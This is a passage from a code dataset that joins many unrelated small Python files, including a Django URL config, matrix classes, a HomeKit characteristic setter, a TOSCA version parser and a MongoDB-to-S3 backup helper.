f.write(\"SUCCES RATE: \" + str(s_rate) + \"%\\n\")","sub_path":"NEdata/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"103110952","text":"from django.urls import path, include\nfrom . import views\n\n\napp_name = 'home'\n\nurlpatterns = [\n path('', views.index, name='index'),\n # path('', views.IndexListView.as_view(), name='index'),\n path('details/', views.details, name='details'),\n path('register.html', views.UserFormView.as_view(), name='register'),\n path('login/', views.UserLoginView.as_view(), name='login'),\n path('login/', views.logout, name='logout'),\n]","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"565952562","text":"\"\"\"\ndoubly connected edge list \n\nrepresentation for network algorithms\n\"\"\"\n\n\n# example of edges from de berg fig 2.6\n\nimport pysal as ps\n\nimport networkx as nx\n\n\nclass Vertex:\n \"\"\" \"\"\"\n def __init__(self, coordinates, incident_edge):\n self.coordinates = coordinates\n incident_edge = incident_edge\n\nclass Face:\n \"\"\" \"\"\"\n def __init__(self, outer_component=None, inner_component=None):\n\n self.outer_component = outer_component\n self.inner_component = inner_component\n\nclass Half_Edge:\n \"\"\" \"\"\"\n def __init__(self, origin, twin, incident_face, Next, Prev):\n self.origin = origin\n self.twin = twin\n self.incident_face = incident_face\n self.Next = Next\n self.Prev = Prev\n\n\nclass DCEL:\n \"\"\"Doubly connected edge list\"\"\"\n def __init__(self, graph):\n\n edges = {}\n vertices = {}\n faces = {}\n half_edges = {}\n\n cycles = nx.cycle_basis(graph)\n fi = 0\n for cycle in cycles:\n n = len(cycle)\n for i in range(n-1):\n e = (cycle[i], cycle[i+1])\n if e not in edges:\n edges[e] = fi\n twin_a = e[0], e[1]\n twin_b = e[1], e[0]\n if twin_a not in half_edges:\n half_edges[twin_a] = fi\n if twin_b not in half_edges:\n half_edges[twin_b] = None\n e = cycle[n-1], cycle[0]\n if e not in edges:\n edges[e] = fi\n faces[fi] = e\n\n\n fi += 1\n\n self.edges = edges\n self.faces = faces\n self.half_edges = half_edges\n\n\nif __name__ == '__main__':\n\n\n p1 = [\n [1,12],\n [6,12],\n [11,11],\n [14,13],\n [19,14],\n [22,9],\n [20,5],\n [16,0],\n [11,2],\n [5,1],\n [0,7],\n [2,9],\n [1,12]]\n\n h1 = [\n [3,7],\n [5,5],\n [8,5],\n [5,8],\n [3,7]\n ]\n\n h2 = [\n [4,10],\n [5,8],\n [8,5],\n [9,8],\n [4,10]\n ]\n\n h3 = [\n [12,6],\n [15,4],\n [18,5],\n [19,7],\n [17,9],\n [14,9],\n [12,6]\n ]\n # note that h1 union h2 forms a single hole in p1\n\n faces = [p1, h1, h2, h3]\n G = nx.Graph()\n\n for face in faces:\n n = len(face)\n for i in range(n-1):\n G.add_edge(tuple(face[i]), tuple(face[i+1]))\n\n\n cycles = nx.cycle_basis(G)\n # len of cycles is equal to the number of faces (not including external face\n\n # find cycles that share a vertex\n node2cycle = {}\n multi_nodes = set()\n for i,cycle in enumerate(cycles):\n for node in cycle:\n if node in node2cycle:\n node2cycle[node].append(i)\n multi_nodes.add(node)\n else:\n node2cycle[node] = [i]\n\n \n\n # check if there are nodes belonging to multiple cycles\n if multi_nodes:\n \n # put nodes for each edge in lexicographic order\n edges = [ sorted(edge) for edge in G.edges()]\n\n\n","sub_path":"pysal/network/dcel.py","file_name":"dcel.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"225966633","text":"import numpy as np\n\n\nclass Matrix(np.ndarray):\n def __new__(cls, ndarray=None):\n if ndarray is None:\n ndarray = np.eye(4)\n obj = np.asanyarray(ndarray).view(cls)\n return obj\n\n def __repr__(self):\n return f\"Matrix({repr(self.tolist())})\"\n\n def __eq__(self, other):\n return np.allclose(self, other)\n\n def __matmul__(self, other):\n if isinstance(other, Matrix):\n return super().__matmul__(other).view(other.__class__)\n else:\n return super().__matmul__(other.T).T.view(other.__class__)\n\n @property\n def inv(self):\n return np.linalg.inv(self)\n\n @staticmethod\n def from_string(string):\n ndarray = np.array(\n [\n [float(xx) for xx in x.split(\"|\")[1:-1]]\n for x in string.strip().splitlines()\n ]\n )\n return Matrix(ndarray)\n\n\nclass Translation(Matrix):\n def __new__(cls, x, y, z):\n obj = super().__new__(cls)\n obj[:3, 3] = [x, y, z]\n return obj\n\n\nclass Scaling(Matrix):\n def __new__(cls, x, y, z):\n obj = super().__new__(cls, np.diag([x, y, z, 1]))\n return obj\n\n\nclass Rotation(Matrix):\n def __new__(cls, x, y, z):\n matrix = np.eye(4)\n\n if x:\n matrix_x = np.eye(4)\n matrix_x[1:3, 1:3] = [[np.cos(x), -np.sin(x)], [np.sin(x), np.cos(x)]]\n matrix = matrix_x @ matrix\n\n if y:\n matrix_y = np.eye(4)\n matrix_y[::2, ::2] = [[np.cos(y), np.sin(y)], [-np.sin(y), np.cos(y)]]\n matrix = matrix_y @ matrix\n\n if z:\n matrix_z = np.eye(4)\n matrix_z[:2, :2] = [[np.cos(z), -np.sin(z)], [np.sin(z), np.cos(z)]]\n matrix = matrix_z @ matrix\n\n obj = super().__new__(cls, matrix)\n return obj\n\n\nclass Shearing(Matrix):\n def __new__(cls, xy, xz, yx, yz, zx, zy):\n matrix = np.eye(4)\n matrix[:3, :3] = [[1, xy, xz], [yx, 1, yz], [zx, zy, 1]]\n obj = super().__new__(cls, matrix)\n return obj\n","sub_path":"src/matrix/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"177610563","text":"# add_job\n## solve model_start_time, model_end_time, model_restart variables.\n### handle nones\n## copy namelist from setup object to job\n## apply solved times/restart to job's namelists\n### namelist.hrldas: start, khour, kday, RESTART\n### hydro.namelist: HYDRO_RST\n## if restart: check that the restart is available\n## diff the setup namelists with the new one to ensure only certain fields are changed.\n\n\nimport datetime\nimport os\nimport re\nfrom wrfhydropy import *\n\nhome = os.path.expanduser(\"~/\")\nmodel_path = home + '/WRF_Hydro/'\nthe_model = WrfHydroModel(\n os.path.expanduser(model_path + '/wrf_hydro_nwm_public/trunk/NDHMS'),\n 'NWM'\n)\n\ndomain_path = '/Users/james/Downloads/croton_NY_domain/domain/croton_NY/'\nthe_domain = WrfHydroDomain(\n domain_top_dir=domain_path,\n model_version='v1.2.1',\n domain_config='NWM'\n)\n\nthe_setup = WrfHydroSetup(\n the_model,\n the_domain\n)\n\nsolve_model_start_end_times = job_tools.solve_model_start_end_times\n\n# #################################\n\n# All are 1 day and 2 hours.\ndef assert_start_end_soln(s,e):\n assert s == datetime.datetime(2011, 8, 26, 0, 0)\n assert e == datetime.datetime(2011, 9, 2, 0, 0)\n\n\ns, e = solve_model_start_end_times(None, None, the_setup)\nassert_start_end_soln(s, e)\n\nmodel_start_time = '2011-08-26 00'\nmodel_end_time = '2011-09-02 00'\ns, e = solve_model_start_end_times(model_start_time, model_end_time, the_setup)\nassert_start_end_soln(s, e)\n\nmodel_start_time = '2011-08-26 00:00'\nmodel_end_time = '2011-09-02 00'\ns, e = solve_model_start_end_times(model_start_time, model_end_time, the_setup)\nassert_start_end_soln(s, e)\n\nmodel_start_time = '2011-08-26 00:00'\nmodel_end_time = datetime.timedelta(days=7)\ns, e = solve_model_start_end_times(model_start_time, model_end_time, the_setup)\nassert_start_end_soln(s, e)\n\nmodel_start_time = '2011-08-26 00:00'\nmodel_end_time = {'hours': 24*7}\ns, e = solve_model_start_end_times(model_start_time, model_end_time, the_setup)\nassert_start_end_soln(s, e)\n\nmodel_start_time = '2011-08-26 00:00'\nmodel_end_time = {'days': 6, 'hours': 24}\ns, e = solve_model_start_end_times(model_start_time, model_end_time, the_setup)\nassert_start_end_soln(s, e)\n","sub_path":"wrfhydro/one_off_scripts/example_job_model_dates.py","file_name":"example_job_model_dates.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"45894558","text":"import xlwt\n\nwb=xlwt.Workbook()\nsht=wb.add_sheet('Sheet1',cell_overwrite_ok=True)\n\nborders=xlwt.Borders()\nborders.top=1\nborders.left=1\nborders.right=1\nborders.bottom=1\n\nalignment=xlwt.Alignment()\nalignment.horz=0x02\nalignment.vert=0x01\n\ntile_font=xlwt.Font()\ntile_font.bold=True\ntile_font.height=350\ntile_font.colour_index=10\n\nltile_font=xlwt.Font()\nltile_font.bold=True\n\ntile_font1=xlwt.Font()\ntile_font1.bold=True\ntile_font1.height=350\ntile_font1.colour_index=49\n\ntile_font2=xlwt.Font()\ntile_font2.bold=True\ntile_font2.height=350\ntile_font2.colour_index=17\n\n\ncell_style=xlwt.XFStyle()\ncell_style.alignment=alignment\ncell_style.borders=borders\n\nlittle_style=xlwt.XFStyle()\nlittle_style.alignment=alignment\nlittle_style.borders=borders\nlittle_style.font=ltile_font\n\nbig_title=xlwt.XFStyle()\nbig_title.font=tile_font\nbig_title.alignment=alignment\nbig_title.borders=borders\n\nsec_title=xlwt.XFStyle()\nsec_title.font=tile_font1\nsec_title.alignment=alignment\nsec_title.borders=borders\n\ntrd_title=xlwt.XFStyle()\ntrd_title.font=tile_font2\ntrd_title.alignment=alignment\ntrd_title.borders=borders\n\n\nsht.write_merge(0,0,0,3,\"标兵榜\",big_title)\nsht.write(1,0,\"支行\",little_style)\nsht.write(1,1,\"完成率\",little_style)\nsht.write(1,2,\"支行\",little_style)\nsht.write(1,3,\"完成率\",little_style)\n\nsht.write_merge(4,4,0,3,\"前有标兵后有追兵榜\",sec_title)\nsht.write(5,0,\"支行\",little_style)\nsht.write(5,1,\"完成率\",little_style)\nsht.write(5,2,\"支行\",little_style)\nsht.write(5,3,\"完成率\",little_style)\n\nsht.write_merge(9,9,0,3,\"追兵榜\",trd_title)\nsht.write(10,0,\"支行\",little_style)\nsht.write(10,1,\"完成率\",little_style)\nsht.write(10,2,\"支行\",little_style)\nsht.write(10,3,\"完成率\",little_style)\nrow_list=[['先行区', 0.12452830188679245], ['历城', 0.07045454545454545], ['济阳', 0.060909090909090906], ['平阴', 0.03495145631067961], ['开发区', 0.034375], ['商河', 0.03428571428571429], ['章丘', 0.01869918699186992], ['营业部', 0.01818181818181818], ['和平', 0.01598173515981735], ['银河', 0.014634146341463415], ['槐荫', 0.013488372093023256], ['天桥', 0.009583333333333333], ['长清', 0.009285714285714286], ['泺源', 0.008556149732620321], ['市中', 0.0084], ['历下', 0.004285714285714286]]\n\nfor i,city in enumerate(row_list):\n\tif i<4:\n\t\tif i<2:\n\t\t\tj=0\n\t\telse:\n\t\t\tj=2\n\t\tsht.write((2+i%2),j,city[0],cell_style)\n\t\tsht.write((2+i%2),j+1,city[1],cell_style)\n\t\tcontinue\n\tif i<10:\n\t\tif i<7:\n\t\t\tm=2\n\t\t\tj=0\n\t\telse:\n\t\t\tm=-1\n\t\t\tj=2\n\t\tsht.write((i+m),j,city[0],cell_style)\n\t\tsht.write((i+m),j+1,city[1],cell_style)\n\t\tcontinue\n\tif i<16:\n\t\tif i<13:\n\t\t\tj=0\n\t\t\tm=1\n\t\telse:\n\t\t\tm=-2\n\t\t\tj=2\n\t\tsht.write((i+m),j,city[0],cell_style)\n\t\tsht.write((i+m),j+1,city[1],cell_style)\n\t\tcontinue\n\n\n\nwb.save('a.xls')\n\n\n","sub_path":"python/xlwt_xls.py","file_name":"xlwt_xls.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"481922962","text":"def manhattan(point1, point2):\n return sum(abs(coord1 - coord2) for coord1, coord2 in zip(point1, point2))\n\n\ndef solve(filename):\n points = []\n with open(filename) as fp:\n for line in fp.readlines():\n pos, r = line.split(' ')\n r_num = int(r.lstrip('r='))\n pos_nums = pos.lstrip('pos=<').rstrip('>,').split(',')\n point = list(map(int, pos_nums))\n point.append(r_num)\n points.append(point)\n\n max_range = max(points, key=lambda x: x[3])\n \n in_range = 0\n for point in points:\n in_range += 1 if manhattan(point[:3], max_range[:3]) <= max_range[3] else 0\n \n return in_range\n\nassert solve('easy_input') == 7\nprint(solve('input'))\n","sub_path":"python/d23p1/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"5837674","text":"# 客户端\n\n# 收发 同时进行 把这个客户端做成一个类\n\n\nimport socket\nimport threading\n\n\nclass Client():\n def __init__(self):\n # 1. 创建套接字\n self.sk = socket.socket()\n # 2. 去链接服务器\n self.sk.connect((\"192.168.40.153\",666))\n t1 = threading.Thread(target=self.recv) # 开启子线程执行发送消息\n t1.start()\n self.send()\n # 发送消息\n def send(self):\n while True:\n str1 = input(\"请输入:\")\n self.sk.send(str1.encode(\"utf8\"))\n print(\"发过去了\")\n\n # 接收消息\n def recv(self):\n while True:\n source = self.sk.recv(1024).decode(\"utf8\")\n print(source)\n print(\"接收消息了\")\n\n\nif __name__ == '__main__':\n Client()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"woniu_workspace/python/day09/聊天室3——1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"597103991","text":"#print one message if the try block raises a NameError and another for other errors\n\ntry:\n a = 123\n if a==123:\n print(b)\n raise NameError(\"Name error\")\n if a >0:\n raise ValueError(\"Value error\")\nexcept NameError as ne:\n print(ne)\nexcept ValueError as ve:\n pritn(ve)\n","sub_path":"(III).py","file_name":"(III).py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"592266870","text":"from math import atan2, pi\n\nclass Solution:\n def visiblePoints(self, points: List[List[int]], angle: int, location: List[int]) -> int:\n if len(points) == 1:\n return 1\n \n lx, ly = location\n angles = []\n me = 0\n \n for px, py in points:\n if px == lx and py == ly:\n me += 1\n else:\n angles.append(atan2(py - ly, px - lx))\n\n angles.sort()\n angles.extend([x + (2.0 * pi) for x in angles])\n \n l, r = 0, 0\n res = 0\n angle = (2 * pi * angle) / 360.0\n while l < len(angles) and r < len(angles):\n while r < len(angles) and angles[r] - angles[l] <= angle:\n res = max(res, r - l + 1)\n r += 1\n l += 1\n \n return res + me","sub_path":"python/1610_Maximum_Number_of_Visible_Points.py","file_name":"1610_Maximum_Number_of_Visible_Points.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"113431685","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n------------------------ Libraries & Global variables -------------------------\n\"\"\"\nimport os\nimport scipy.io as sio\nimport numpy as np\nimport pandas as pd\nfrom global_path import DATA_DIR, STIMULI\n\n\"\"\"\n-------------------------------- Read file data -------------------------------\n\"\"\"\ndef read_mat_file(stimulus, patient_id, data_dir = DATA_DIR):\n save_file = 'Stimuli'+str(stimulus)+'__'+patient_id+'.mat'\n file_path = os.path.join(data_dir, save_file)\n vid_data = sio.loadmat(file_path)['vid_data']\n values = vid_data.item()\n field = vid_data.dtype.names\n dict_list = [(field[i], values[i]) for i in range(len(field))]\n dict_list.append(('id', patient_id))\n return dict(dict_list)\n\ndef read_MCHAT(data_dir = DATA_DIR):\n file_path = os.path.join(data_dir, 'questions.xlsx')\n df = pd.read_excel(file_path, index_col=None)\n ids = df['Individual'].values\n X = (df.values[:,2:22] == 'fail') + 0\n y = df['Asd'].values\n neg, pos, mid, unk = y=='no', y=='yes', y=='suspected', y=='unknown'\n y[pos], y[neg], y[mid], y[unk] = 1, -1, 0, np.nan\n mchat_scoring = df.values[:,22:]\n return ids, X, y, mchat_scoring\n\n\"\"\"\n------------------------- Split training and testing --------------------------\n\"\"\"\ndef split(data_dir = DATA_DIR, percentage = .3):\n # Read files\n ids, X, y, mchat_scoring = read_MCHAT(data_dir)\n pos, neg = ids[y==1], ids[y==-1]\n # Number to remove\n remove_pos = int(percentage * pos.shape[0])\n remove_neg = int(percentage * neg.shape[0])\n # Split ids\n test_pos = np.random.permutation(pos)[:remove_pos]\n test_neg = np.random.permutation(neg)[:remove_neg]\n # Write it in a file, this is not really the best way to do it\n test, test_y = list(), list()\n train, train_y = list(), list()\n for i in range(len(ids)):\n patient_id = ids[i]\n if patient_id in test_pos or patient_id in test_neg:\n test.append(patient_id)\n test_y.append(y[i])\n else: \n train.append(patient_id)\n train_y.append(y[i])\n test_tmp = np.transpose(np.vstack((test, test_y)))\n testFrame = pd.DataFrame(test_tmp, columns=['Id','Output'])\n train_tmp = np.transpose(np.vstack((train, train_y)))\n trainFrame = pd.DataFrame(train_tmp, columns=['Id','Output'])\n testFrame.to_csv(os.path.join(data_dir, 'test_ids.csv'), index=None)\n trainFrame.to_csv(os.path.join(data_dir, 'train_ids.csv'), index=None)\n\n\"\"\"\n--------------------------------- Access data ---------------------------------\n\"\"\"\ndef get_ids(data_dir = DATA_DIR):\n ids, _, labels, _ = read_MCHAT(data_dir=data_dir)\n return ids, labels\n\ndef keep_label(ids, labels, keep=\"good\", verbose = False):\n if keep == \"pos\":\n ind = labels==1\n elif keep == \"neg\":\n ind = labels==-1\n elif keep == \"good\":\n ind = np.logical_or(labels==-1, labels==1)\n if verbose:\n return ids[ind], labels[ind].astype(np.int), ind\n else:\n return ids[ind], labels[ind].astype(np.int)\n \ndef get_data(stimulus, patient_id, data_dir = DATA_DIR):\n dictionary = read_mat_file(stimulus, patient_id, data_dir = data_dir)\n detected = dictionary.get('face_detection').flatten() == 1\n timestamps = dictionary.get('timestamps').flatten()\n timestamps = timestamps[detected]\n landmarks = dictionary.get('original_landmarks')\n landmarks = landmarks[:, detected]\n # Correct potential overflow\n timestamps = timestamps.astype(np.float32)\n landmarks = landmarks.astype(np.float32)\n return landmarks, timestamps\n\n\"\"\"\n------------------------------- Access all data -------------------------------\n\"\"\" \ndef compute_all(features_extractor, ids):\n nb_ids, nb_stimulis = len(ids), len(STIMULI)\n values = np.zeros((nb_ids, nb_stimulis)).astype(np.dtype(object))\n ind = np.zeros(nb_ids)==0\n for i in range(nb_ids):\n patient_id = ids[i]\n for j in range(nb_stimulis):\n stimulus = STIMULI[j]\n try:\n landmarks, timestamps = get_data(stimulus, patient_id)\n features = features_extractor(landmarks, timestamps, stimulus)\n values[i,j] = features\n except FileNotFoundError:\n ind[i] = False\n print(\"Patient %s stimuli %d not found\" %(patient_id,stimulus))\n continue \n return values[ind,:], ind\n \ndef concatenate_all(values): \n all_val = np.hstack(values[:,0])\n for i in range(1,4):\n tmp = np.hstack(values[:,i])\n all_val = np.hstack((all_val, tmp))\n all_val[np.isnan(all_val)] = 0\n all_val[all_val==np.inf] = 0\n all_val[all_val==-np.inf] = 0\n return all_val\n\ndef homogenized_description(extractor, keep='good',\n homogenize=False, keep_norm='neg'):\n all_ids, all_labels = get_ids()\n ids, labels = keep_label(all_ids, all_labels, keep=keep)\n values, ind = compute_all(extractor, ids)\n ids, labels = ids[ind], labels[ind]\n \n if homogenize:\n _, _, ind = keep_label(ids, labels, keep=keep_norm, verbose=True)\n val = values[ind, :]\n all_values = concatenate_all(val)\n mean = np.expand_dims(np.mean(all_values, axis=1), axis=1)\n std = np.expand_dims(np.sqrt(np.var(all_values, axis=1)), axis=1)\n for i in range(values.shape[0]):\n for j in range(values.shape[1]):\n tmp = values[i,j] \n tmp -= mean\n tmp /= std\n tmp[np.isnan(tmp)] = 0\n values[i,j] = tmp\n return values, labels, ids","sub_path":"data_handling.py","file_name":"data_handling.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"427849803","text":"#!/usr/bin/env python3\n\nimport json\nimport argparse\nimport http.client\nimport sys\n\nfrom homekit import find_device_ip_and_port, SecureHttp, load_pairing, get_session_keys, HapStatusCodes\n\n\ndef setup_args_parser():\n parser = argparse.ArgumentParser(description='HomeKit perform app - performs operations on paired devices')\n parser.add_argument('-f', action='store', required=True, dest='file', help='File with the pairing data')\n parser.add_argument('-c', action='store', required=False, dest='characteristics')\n parser.add_argument('-v', action='store', required=False, dest='value')\n\n return parser\n\n\nif __name__ == '__main__':\n parser = setup_args_parser()\n args = parser.parse_args()\n\n pairing_data = load_pairing(args.file)\n if pairing_data is None:\n print('File {file} not found!'.format(file=args.file))\n sys.exit(-1)\n\n deviceId = pairing_data['AccessoryPairingID']\n\n connection_data = find_device_ip_and_port(deviceId)\n if connection_data is None:\n print('Device {id} not found'.format(id=deviceId))\n sys.exit(-1)\n\n conn = http.client.HTTPConnection(connection_data['ip'], port=connection_data['port'])\n pairing_data = load_pairing(args.file)\n\n controllerToAccessoryKey, accessoryToControllerKey = get_session_keys(conn, pairing_data)\n\n if not args.characteristics:\n parser.print_help()\n sys.exit(-1)\n if not args.value:\n parser.print_help()\n sys.exit(-1)\n\n tmp = args.characteristics.split('.')\n aid = int(tmp[0])\n iid = int(tmp[1])\n value = args.value\n\n sec_http = SecureHttp(conn.sock, accessoryToControllerKey, controllerToAccessoryKey)\n\n body = json.dumps({'characteristics': [{'aid': aid, 'iid': iid, 'value': value}]})\n print(body)\n response = sec_http.put('/characteristics', body)\n data = response.read().decode()\n if response.code != 204:\n data = json.loads(data)\n code = data['status']\n print('put_characteristics failed because: {reason} ({code})'.format(reason=HapStatusCodes[code], code=code))\n else:\n print('put_characteristics succeeded')\n\n conn.close()\n","sub_path":"homekit/put_characteristic.py","file_name":"put_characteristic.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"607608331","text":"# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom itertools import imap\nfrom collections import namedtuple\n\nfrom ..exceptions import DSLParsingLogicException\n\nVERSION = 'tosca_definitions_version'\nBASE_VERSION_PROFILE = 'tosca_aria_yaml'\n\n\nclass VersionNumber(namedtuple('VersionNumber', 'major, minor, micro')):\n def __new__(cls, major, minor, micro=0):\n return super(VersionNumber, cls).__new__(cls, major, minor, micro)\n\n def __repr__(self):\n return (\n '{cls.__name__}'\n '(major={self.major}, minor={self.minor}, micro={self.micro})'\n .format(cls=self.__class__, self=self))\n\n\nclass VersionStructure(namedtuple('VersionStructure', 'profile, number')):\n def __repr__(self):\n return (\n '{cls.__name__}(profile={self.profile}, number={self.number!r})'\n .format(cls=self.__class__, self=self))\n\n @property\n def name(self):\n return (\n '{self.profile}_{self.number.major}_'\n '{self.number.minor}_{self.number.micro}'.format(self=self))\n\n\nclass SupportedVersions(object):\n def __init__(self, database):\n self.database = database\n\n def __contains__(self, version):\n return any(imap(\n lambda supported_version: supported_version == version,\n self.versions()))\n\n @property\n def base_version(self):\n return next(iter(self.database[BASE_VERSION_PROFILE]))\n\n def versions(self):\n for version_structures in self.database.itervalues():\n for version_structure in version_structures:\n yield version_structure\n\n def create_version_structure(self, version_name):\n if not version_name:\n raise DSLParsingLogicException(\n 71, '{0} is missing or empty'.format(VERSION))\n\n if not isinstance(version_name, basestring):\n raise DSLParsingLogicException(\n 72, 'Invalid {0}: {1} is not a string'.format(\n VERSION, version_name))\n\n for prefix in self.database.iterkeys():\n if version_name.startswith(prefix):\n short_dsl_version = version_name[len(prefix) + 1:]\n break\n else:\n raise DSLParsingLogicException(\n 73, \"Invalid {0}: '{1}', expected a value following \"\n \"this format: '{2}'\".format(\n VERSION, version_name, self.base_version.name))\n\n if '_' not in short_dsl_version:\n raise DSLParsingLogicException(\n 73, \"Invalid {0}: '{1}', \"\n \"expected a value following this format: '{2}'\".format(\n VERSION, version_name, self.base_version.name))\n\n version_parts = short_dsl_version.split('_')\n if len(version_parts) == 2:\n major, minor = version_parts\n micro = '0'\n else:\n major, minor, micro = version_parts\n\n if not major.isdigit():\n raise DSLParsingLogicException(\n 74, \"Invalid {0}: '{1}', major version is '{2}' \"\n \"while expected to be a number\".format(\n VERSION, version_name, major))\n\n if not minor.isdigit():\n raise DSLParsingLogicException(\n 75, \"Invalid {0}: '{1}', minor version is '{2}' \"\n \"while expected to be a number\".format(\n VERSION, version_name, minor))\n\n if not micro.isdigit():\n raise DSLParsingLogicException(\n 76, \"Invalid {0}: '{1}', micro version is '{2}' \"\n \"while expected to be a number\".format(\n VERSION, version_name, micro))\n\n return VersionStructure(\n profile=prefix, # pylint: disable=undefined-loop-variable\n number=VersionNumber(int(major), int(minor), int(micro)))\n\n def validate_dsl_version(self, version_structure):\n if version_structure not in self:\n raise DSLParsingLogicException(\n 29,\n 'Unexpected tosca_definitions_version {0!r}; Currently '\n 'supported versions are: {1}'\n .format(version_structure, list(self.versions())))\n","sub_path":"aria/parser/dsl_supported_versions/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"134765852","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 29 09:50 2017\n\n@author: andrewalferman\n\"\"\"\n\nimport os as os\nimport numpy as np\nimport pyjacob as pyjacob\nimport matplotlib.pyplot as plt\n# import scipy as sci\n\n\ndef loadpasrdata(num):\n \"\"\"Load the initial conditions from the PaSR files.\"\"\"\n pasrarrays = []\n print('Loading data...')\n for i in range(num):\n filepath = os.path.join(os.getcwd(),\n 'pasr_out_h2-co_' +\n str(i) +\n '.npy')\n filearray = np.load(filepath)\n pasrarrays.append(filearray)\n return np.concatenate(pasrarrays, 1)\n\n\ndef rearrangepasr(Y, useN2):\n \"\"\"Rearrange the PaSR data so it works with pyJac.\"\"\"\n press_pos = 2\n temp_pos = 1\n arraylen = len(Y)\n\n Y_press = Y[press_pos]\n Y_temp = Y[temp_pos]\n Y_species = Y[3:arraylen]\n Ys = np.hstack((Y_temp, Y_species))\n\n # Put N2 to the last value of the mass species\n N2_pos = 9\n newarlen = len(Ys)\n Y_N2 = Ys[N2_pos]\n # Y_x = Ys[newarlen - 1]\n for i in range(N2_pos, newarlen - 1):\n Ys[i] = Ys[i + 1]\n Ys[newarlen - 1] = Y_N2\n if useN2:\n initcond = Ys\n else:\n initcond = Ys[:-1]\n return initcond, Y_press\n\n\n# Load the initial conditions from the PaSR files\npasr = loadpasrdata(1)\nnumparticles = len(pasr[0, :, 0])\nnumtsteps = len(pasr[:, 0, 0])\n\nfor i in pasr[469, 91, :]:\n print(i)\n\n\n\n# # All of the species names, after the data has been rearranged\n# speciesnames = ['H', 'H$_2$', 'O', 'OH', 'H$_2$O', 'O$_2$', 'HO$_2$',\n# 'H$_2$O$_2$', 'Ar', 'He', 'CO', 'CO$_2$', 'N$_2$']\n# # Keep in mind that the states also have temperature data\n#\n# states = np.empty((14, numtsteps*numparticles))\n#\n# # Rearrange all of the particles so that histograms can be made\n# count = 0\n# for i in range(numparticles):\n# for j in range(numtsteps):\n# particle, press = rearrangepasr(pasr[j, i, :], True)\n# for k in range(len(particle)):\n# states[k, count] = particle[k]\n# count += 1\n#\n# # Clear all previous figures and close them all\n# for i in range(15):\n# plt.figure(i)\n# plt.clf()\n# plt.close('all')\n#\n# # Make the histograms and plots\n# print('Plotting...')\n# for i in range(7):\n# plt.figure(i)\n# if i == 0:\n# title = 'Temperature'\n# else:\n# title = speciesnames[i-1]\n# print(title)\n# plt.hist(states[i, :100100], bins='auto')\n# plt.title(title)\n#\n# plt.show()\n","sub_path":"H2_CO/PaSR_Histogram.py","file_name":"PaSR_Histogram.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"528958179","text":"import os\nfrom datetime import datetime\n\n# 3rd Party Imports\nimport boto\nfrom boto.s3.key import Key\nfrom click import echo\n\nfrom .utils import temp_directory, zipdir\nfrom .local import local_restore\nfrom .mongo import dump_db\n\n\ndef get_s3_bucket(s3_settings):\n conn = boto.connect_s3(s3_settings['aws_access_key_id'], s3_settings['aws_secret_access_key'])\n bucket = conn.get_bucket(s3_settings['bucket_name'])\n return bucket\n\n\ndef generate_uniqueish_key(s3_settings, environment, name_prefix):\n bucket = get_s3_bucket(s3_settings)\n\n if name_prefix and name_prefix != '':\n name_base = name_prefix\n else:\n name_base = environment['db_name']\n\n name_attempt = \"{}__{}.dmp.zip\".format(name_base, datetime.utcnow().strftime(\"%Y_%m_%d\"))\n\n key = bucket.get_key(name_attempt)\n\n if not key:\n key = Key(bucket)\n key.key = name_attempt\n return key\n else:\n counter = 1\n while True:\n counter += 1\n name_attempt = \"{}__{}_{}.dmp.zip\".format(name_base,\n datetime.utcnow().strftime(\"%Y_%m_%d\"), counter)\n\n if bucket.get_key(name_attempt):\n continue\n else:\n key = Key(bucket)\n key.key = name_attempt\n return key\n\n\ndef backup_to_s3(environment, 